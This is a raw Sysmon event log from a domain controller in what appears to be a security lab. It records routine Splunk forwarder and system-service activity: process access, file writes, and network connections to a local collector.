10341000x80000000000000002201007Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201006Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-842F-603E-0C00-00000000AD01}852384C:\Windows\system32\svchost.exe{5ABCFE62-843F-603E-2C00-00000000AD01}1764C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002201005Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-842D-603E-0500-00000000AD01}416532C:\Windows\system32\csrss.exe{5ABCFE62-E703-6040-F34D-00000000AD01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002201004Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.415{5ABCFE62-84A2-603E-A500-00000000AD01}28764504C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe{5ABCFE62-E703-6040-F34D-00000000AD01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6b246|C:\Windows\System32\KERNEL32.DLL+1c213|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+ce6a3b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17cade|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18641d|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+17ef16|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c992c4|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+18689b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+189d3c|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c95f5f|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c99fad|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+184c5b|C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe+c7dd7e|C:\Windows\System32\ucrtbase.dll+1fb80|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 154100x80000000000000002201003Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.416{5ABCFE62-E703-6040-F34D-00000000AD01}4960C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe-----"C:\Program Files\SplunkUniversalForwarder\bin\splunk-powershell.exe"C:\Windows\system32\NT AUTHORITY\SYSTEM{5ABCFE62-842D-603E-E703-000000000000}0x3e70SystemMD5=030CC9FD3784684043D9236FF16904DE,SHA256=6C84A212BD1EA1FCC493E9F8ED1C1507E2773F6FE71ACDE265067F3153BE6241,IMPHASH=45491F0E80AC016364EB8FB78BD23A1C{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe"C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe" service 10341000x80000000000000002201002Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:19.040{5ABCFE62-E702-6040-F24D-00000000AD01}47326956C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe{5ABCFE62-84A2-603E-A500-00000000AD01}2876C:\Program Files\SplunkUniversalForwarder\bin\splunkd.exe0x101400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+5691a5|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+568cd6|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56657|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+56ca7|C:\Program Files\SplunkUniversalForwarder\bin\splunk-regmon.exe+8f3800|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 23542300x80000000000000002201014Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:20.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=15CBD9F0A343556DC541870C6D964F3A,SHA256=59F0929852A2709A4856C4A7CB072785F5001E5A236316B0A4027DB64D160B70,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201015Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:21.024{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5A7BEA8DDD4C6776645841CC0E2371AB,SHA256=DCE537BD0DB3CDDE99F4F4E06B279A033721EAA3E6BABB619F4D2DC784ED4F26,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201017Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:22.196{5ABCFE62-842F-603E-1100-00000000AD01}620NT AUTHORITY\LOCAL SERVICEC:\Windows\System32\svchost.exeC:\Windows\ServiceProfiles\LocalService\AppData\Local\lastalive0.datMD5=1B638436B300766ABA5F6CAC32F26AA5,SHA256=A7083E0E78789EF57B491668658B6A36AFC7423EF691A19639005AF76433EAB0,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201016Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:22.040{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=BCCFDF80893F345D24378E490123153D,SHA256=5D5E77BACC5B15752C0555F88FF8ADCAA918217741ADB9985CCFBCD76AB6CA17,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201020Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:20.002{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55178-false10.0.1.12-8000- 23542300x80000000000000002201019Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:23.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=B116360F16ABAC55B368955C712090E1,SHA256=A5EA381C93CA9539A4267723DED9EB817B8CA077BA1ADA96D2655B8BD727FCB2,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201018Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:23.056{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A1D1B372D5ECFF316D74EB0C33848A3F,SHA256=22710DC473F9DC3A3757C7E40E3363EA21A60014595A5A64B9DDD46787A932DB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201021Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:24.071{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5C134F5FB4F16C404ED1104E398AEBC5,SHA256=1E81994F30D4414623E234EF5BE13FF8E558A861A43B47095D7855C60BC2B376,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201023Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:25.087{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=2533FAACA87015D922D2C2EB0134FA20,SHA256=E2A525EAABF6CC97E1DDFCBCAA53083971D3EDA8D8DBBD48E89BD75046A0FEEE,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201022Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:25.040{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=50B12ECF036C0628F4FD5FD4C34B7734,SHA256=10B2BDEF411413D5AACECABCC7A6DEA4796226D443489B1666383922D9059A33,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201024Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:26.087{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9492E4632D42BE71B8E9515B1261448C,SHA256=1FA143C4E5E6C58CDB37B1F9BC2C988C8732180A476C4598642D3F7549B09622,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201025Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:27.102{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E96AA5F28CF0A80F4414DFF875E5F49A,SHA256=93146D717520CF3B4C7366AB2B0F61639B83C4CD0D747BEA8936CD72B32F0DBA,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201027Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:28.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=CB124BF0A542992FEB55A713A512E459,SHA256=37D2F39017BE0529CCCE2F3DF0FD8D3026C91FEC84E0E1DD37C417963DD7DCF6,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201026Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:28.118{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EBC9983199C36B12867D6F5E323149B2,SHA256=89594571ADEB48F03683BAEA3C49A5F7185068F526EA2F6D180ACDD21142BE31,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201029Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:29.134{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=A20070DD72ACD233EFF3A69045F0CC32,SHA256=41FA04C55AF572374548575CFA2BEFA2010404C6174795B1EBB8702209C5D1F0,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201028Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:25.049{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55179-false10.0.1.12-8000- 23542300x80000000000000002201030Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:30.149{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=AC869CD1C1C99E28067623357EA12FED,SHA256=85D2F44F5DEB05620846331F67E04A758AE0737B15D1F81352195CFB775F4340,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201031Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:31.149{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=FDA9F0EEC65A6A4F3D0FBDA22740047C,SHA256=8DC61B025E49E1CEBCFDA46252397072C6D911E43C59B162008AD3EB05E22D29,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201032Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:32.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=E7FDB1073245C0D82D9316F4A029E157,SHA256=A58ED39EC6B4CF11E03CC1AD8A3294DA20013182F5F79F5666C10F4F8C9D3B28,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201035Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:33.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACC42FDF500BD2411FAA3269316F2EB1,SHA256=98AD1D936A9197C7EE54008C9FBB2E6C57C7F5FABFCB8103E6C61E0511FB8161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201034Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:33.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=88994680D46F5BC03F2AEB647F9E7638,SHA256=FDDA72F5E7C6E5A599DCDDC7C588B3ADC6F724AF8E55A55EC782428CD08E1ECB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201033Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:33.165{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=EDEBCAC1B293CB00069721157569B07F,SHA256=4BA96D3A44258506C2A06163E31217DDA70C292F9DE5F79213514565C114EDA5,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201036Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:34.181{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=815891A858BA75998B4CBB42BF7DB266,SHA256=9CDAB374A6D7B3DA293563829335A9AA7028717F19A178D91992DD85023AF10A,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201038Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:35.196{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=5B9ED3C56AAFCF9403459AC4C4493BBC,SHA256=092C39214DEB797C299BEBF0D8D7B485AAFC71BB4151BC462A5AC25ABD66F82A,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201037Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:30.080{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55181-false10.0.1.12-8000- 23542300x80000000000000002201039Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:36.212{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=851D38EA769F5A043CE7E490BFF81EEB,SHA256=844B4766136A499C12986B5807D56A45141B6DF95D0FEF5E518265593793A040,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201040Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:37.212{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=9B1267D8BF61C9083FDB0FC23E5D86AF,SHA256=DB18C41782ADE444491F49DA6692A3157AD3E6AB443D6F0A9C5CFA856798D76C,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201043Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:38.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB3E6DD5D1A8EB260A5E499EB681E799,SHA256=E3D2869517CE173A2EECD146B4573F3A71A8D10F2037DE10F3B972D3243BCE99,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201042Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:38.743{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=ACC42FDF500BD2411FAA3269316F2EB1,SHA256=98AD1D936A9197C7EE54008C9FBB2E6C57C7F5FABFCB8103E6C61E0511FB8161,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201041Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:38.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=F121E3D199E66AA79F998F17186506C9,SHA256=AF4146D86311928B7EFF6E5DC98F442978471F9E06F6D0741E5EB5C2B5911DCD,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201045Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:39.243{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=116F99ABA99EB4CDD5ADB5ACFBADDE65,SHA256=7C9577E759E19E22B008AB881FCF1EEDC98FE99B1832C7D0FEDC629C0DF914E8,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201044Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:35.533{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsetrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local53domaintrue0:0:0:0:0:0:0:1win-dc-228.attackrange.local63141- 354300x80000000000000002201048Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:36.532{5ABCFE62-843F-603E-2E00-00000000AD01}2300C:\Windows\System32\dns.exeNT AUTHORITY\SYSTEMudpfalsefalse127.0.0.1-53domainfalse127.0.0.1-63141- 354300x80000000000000002201047Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:35.908{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55182-false10.0.1.12-8000- 23542300x80000000000000002201046Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:40.259{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=DD2CFF5EAA9940655116C7375BC3A48F,SHA256=1322DEF00456886A8F8C522868EC3134A7289FBBA2F1647B7304C35863E8A592,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201049Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:41.274{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=64C000C0A814AB7E44C73083937232BE,SHA256=D5008C8E8A254556395BAC7386A5004799A436DCDA43E27D69F23A805112D9FB,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201050Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:42.274{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=ACB5E8FAD835ACB172B317DE88C51598,SHA256=D3FFFA44DF6464A5EF70A75B0978EBD4E0B282B4CFEAFC35F7507D040D805444,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201051Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:43.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=1D7C067FB10195DC9439498D09950D43,SHA256=6DD1A4492F85BA60091D1451D3157BAB50276B70C3BF0B4F3C6904B20498534F,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201054Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:44.290{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\Microsoft-Windows-Sysmon_OperationalMD5=180CF21F2C60B9DAFFF079663BAC4FC1,SHA256=1DF3F09ECA27C590A4CAE6124ED192DE4E5D7B4760BE159E9DC7D9A6F8E9E49E,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201053Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:44.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=2A11573617AFD5C1884E4A3B2F975D50,SHA256=D98DC6A1C8BCBB5AF4126060AB691942CD519A7CF3A5D4A06F19914EC6E1D637,IMPHASH=00000000000000000000000000000000falsetrue 23542300x80000000000000002201052Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:44.227{5ABCFE62-84AF-603E-DC00-00000000AD01}3964NT AUTHORITY\SYSTEMC:\Program Files\SplunkUniversalForwarder\bin\splunk-winevtlog.exeC:\Program Files\SplunkUniversalForwarder\var\lib\splunk\modinputs\WinEventLog\SecurityMD5=AB3E6DD5D1A8EB260A5E499EB681E799,SHA256=E3D2869517CE173A2EECD146B4573F3A71A8D10F2037DE10F3B972D3243BCE99,IMPHASH=00000000000000000000000000000000falsetrue 354300x80000000000000002201056Microsoft-Windows-Sysmon/Operationalwin-dc-228.attackrange.local-2021-03-04 13:56:40.908{5ABCFE62-84AA-603E-D300-00000000AD01}3788C:\Program Files\SplunkUniversalForwarder\etc\apps\Splunk_TA_stream\windows_x86_64\bin\streamfwd.exeNT AUTHORITY\SYSTEMtcptruefalse10.0.1.14win-dc-228.attackrange.local55183-false10.0.1.12-8000- 